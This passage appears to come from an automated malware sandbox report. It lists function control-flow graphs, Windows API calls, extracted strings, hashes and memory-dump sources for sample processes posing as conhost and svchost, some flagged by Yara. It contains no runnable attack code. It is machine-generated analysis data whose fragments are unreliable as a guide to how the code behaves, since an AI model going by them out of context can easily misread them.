479->442 482 140005a1a 479->482 480->474 480->479 482->445 491 1400059e8-1400059ef 483->491 492 1400059bb 483->492 486->486 488 140005970 486->488 488->483 491->475 493 1400059c0-1400059cc 492->493 494 1400059e3 493->494 495 1400059ce-1400059e1 493->495 494->491 495->493 495->494
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID: ?y$ ?y$L|$N5|$\BaseNamedObjects\bfogiitplfr
                                                    • API String ID: 2803490479-155973555
                                                    • Opcode ID: 9af8046b94f9c6951774024781bc7e2fabfd86d26fb14ec1a353dfdc9d78cc43
                                                    • Instruction ID: e60e1106883680243f341ea298bfd8593a1483f05467b02424e6f67d4a1e210e
                                                    • Opcode Fuzzy Hash: 9af8046b94f9c6951774024781bc7e2fabfd86d26fb14ec1a353dfdc9d78cc43
                                                    • Instruction Fuzzy Hash: 0E71ECB67056008BE766EF2AB4047BB37A1F38EBC9F455214FF4A437A1EA34C8448780

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 496 140002104-14000210b 497 140002111-140002128 EnterCriticalSection 496->497 498 140002218-140002221 496->498 499 14000220b-140002212 LeaveCriticalSection 497->499 500 14000212e-14000213c 497->500 501 140002272-140002280 498->501 502 140002223-14000222d 498->502 499->498 503 14000214d-140002159 TlsGetValue GetLastError 500->503 504 140002241-140002263 DeleteCriticalSection 502->504 505 14000222f 502->505 507 14000215b-14000215e 503->507 508 140002140-140002147 503->508 504->501 506 140002230-14000223f free 505->506 506->504 506->506 507->508 509 140002160-14000216d 507->509 508->499 508->503 509->508
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                    • String ID:
                                                    • API String ID: 3326252324-0
                                                    • Opcode ID: 2bcf3dcd25651d18e2244daa97576b36d0091e20395cf14c1170a63a424e11bd
                                                    • Instruction ID: ecd7ac4361a8a51638a2c024777f04497577f20fbf85b935da8e308ca4a4dd03
                                                    • Opcode Fuzzy Hash: 2bcf3dcd25651d18e2244daa97576b36d0091e20395cf14c1170a63a424e11bd
                                                    • Instruction Fuzzy Hash: D32113B5205A5092FA2BDB53FD443E823A5BB2DBD0F444021FF4A576B0DB78C9868700

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 511 140001e10-140001e2d 512 140001e3e-140001e48 511->512 513 140001e2f-140001e38 511->513 515 140001ea3-140001ea8 512->515 516 140001e4a-140001e53 512->516 513->512 514 140001f60-140001f69 513->514 515->514 519 140001eae-140001eb3 515->519 517 140001e55-140001e60 516->517 518 140001ecc-140001ed1 516->518 517->515 522 140001f23-140001f2d 518->522 523 140001ed3-140001ee2 signal 518->523 520 140001eb5-140001eba 519->520 521 140001efb-140001f0a call 140005d30 519->521 520->514 527 140001ec0 520->527 521->522 532 140001f0c-140001f10 521->532 525 140001f43-140001f45 522->525 526 140001f2f-140001f3f 522->526 523->522 528 140001ee4-140001ee8 523->528 525->514 526->525 527->522 529 140001eea-140001ef9 signal 528->529 530 140001f4e-140001f53 528->530 529->514 533 140001f5a 530->533 534 140001f12-140001f21 signal 532->534 535 140001f55 532->535 533->514 534->514 535->533
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CCG
                                                    • API String ID: 0-1584390748
                                                    • Opcode ID: 9be77d232e1bf49bb0ff27893442f8eecaf9815c93bc822214e8784620e973ff
                                                    • Instruction ID: 4d662d8802e72e72d4d0304bd7a933a05bbf67ab2be55893078273551cf016b7
                                                    • Opcode Fuzzy Hash: 9be77d232e1bf49bb0ff27893442f8eecaf9815c93bc822214e8784620e973ff
                                                    • Instruction Fuzzy Hash: BD2159B1A0154542FB7BDA2BB5943FA1182ABCD7E4F258536BF19473F5DE3888828241

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 536 140001880-14000189c 537 1400018a2-1400018f9 call 140002420 call 140002660 536->537 538 140001a0f-140001a1f 536->538 537->538 543 1400018ff-140001910 537->543 544 140001912-14000191c 543->544 545 14000193e-140001941 543->545 546 14000194d-140001954 544->546 547 14000191e-140001929 544->547 545->546 548 140001943-140001947 545->548 551 140001956-140001961 546->551 552 14000199e-1400019a6 546->552 547->546 549 14000192b-14000193a 547->549 548->546 550 140001a20-140001a26 548->550 549->545 553 140001b87-140001b98 call 140001d40 550->553 554 140001a2c-140001a37 550->554 555 140001970-14000199c call 140001ba0 551->555 552->538 556 1400019a8-1400019c1 552->556 554->552 558 140001a3d-140001a5f 554->558 555->552 557 1400019df-1400019e7 556->557 561 1400019e9-140001a0d VirtualProtect 557->561 562 1400019d0-1400019dd 557->562 563 140001a7d-140001a97 558->563 561->562 562->538 562->557 566 140001b74-140001b82 call 140001d40 563->566 567 140001a9d-140001afa 563->567 566->553 573 140001b22-140001b26 567->573 574 140001afc-140001b0e 567->574 577 140001b2c-140001b30 573->577 578 140001a70-140001a77 573->578 575 140001b5c-140001b6c 574->575 576 140001b10-140001b20 574->576 575->566 579 140001b6f call 140001d40 575->579 576->573 576->575 577->578 580 140001b36-140001b57 call 140001ba0 577->580 578->552 578->563 579->566 580->575
                                                    APIs
                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                    • API String ID: 544645111-395989641
                                                    • Opcode ID: 9c0a323ff743adb5e1f5d62c643127542f38c96fed50a29024f7a0a4e0bb8937
                                                    • Instruction ID: ef28e12e09f805c4fb9296d3f28bb6203a79f2ea2cc41dff8a2a295a6be7a035
                                                    • Opcode Fuzzy Hash: 9c0a323ff743adb5e1f5d62c643127542f38c96fed50a29024f7a0a4e0bb8937
                                                    • Instruction Fuzzy Hash: 3F5126B6710A44D6EB62CF67F8407E92762B75DBE8F548221EB19177B4CB38C586C700

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 584 140001800-140001810 585 140001812-140001822 584->585 586 140001824 584->586 587 14000182b-140001867 call 140002290 fprintf 585->587 586->587
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: fprintf
                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                    • API String ID: 383729395-3474627141
                                                    • Opcode ID: 136977c8644899b2cc079cc555eeb039d986dfa363f92bb912325e8a51fe259a
                                                    • Instruction ID: d8f17dc2b391d5c90476132d0c1db822027a4e4283f61dc79e78dd6b84251244
                                                    • Opcode Fuzzy Hash: 136977c8644899b2cc079cc555eeb039d986dfa363f92bb912325e8a51fe259a
                                                    • Instruction Fuzzy Hash: C8F09671614A4482E612EB76B9413ED6361F75D7C1F54D211FF4D67662DF38D182C300

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 590 14000219e-1400021a5 591 140002272-140002280 590->591 592 1400021ab-1400021c2 EnterCriticalSection 590->592 593 140002265-14000226c LeaveCriticalSection 592->593 594 1400021c8-1400021d6 592->594 593->591 595 1400021e9-1400021f5 TlsGetValue GetLastError 594->595 596 1400021f7-1400021fa 595->596 597 1400021e0-1400021e7 595->597 596->597 598 1400021fc-140002209 596->598 597->593 597->595 598->597
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2454820636.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000B.00000002.2454743674.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454870262.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454926774.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2454966935.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                    • String ID:
                                                    • API String ID: 682475483-0
                                                    • Opcode ID: 84c6b97aa09a22692e21b304b5fd6ac024d808839be14f11d3169013a483071a
                                                    • Instruction ID: b3fba70f40b73b8f49bd27031bac50f78259e1444c1ebff1c4da7465ef22c8ab
                                                    • Opcode Fuzzy Hash: 84c6b97aa09a22692e21b304b5fd6ac024d808839be14f11d3169013a483071a
                                                    • Instruction Fuzzy Hash: 6201A4B6205A5092FA5BDB63FD043D86365BB2CBD1F494021EF09536B4DBB989968300

                                                    Non-executed Functions

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2454824237.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000000C.00000002.2454749681.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2455639976.00000001404C8000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2455639976.00000001404EC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2455639976.0000000140777000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2455639976.00000001407F8000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2455954249.00000001407FB000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2456031629.000000014081B000.00000020.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2456091398.0000000140821000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_140000000_svchost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                                    • Instruction ID: 79b49984e369f14b3cfd6b091ae87a2c1abf041b5e0bbbfb70a1ccaeb1af311f
                                                    • Opcode Fuzzy Hash: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                                    • Instruction Fuzzy Hash: 89112736710F018AEB11CF61E8553A933A4F75DB58F481E25EB6D86BA4DBB8C1998340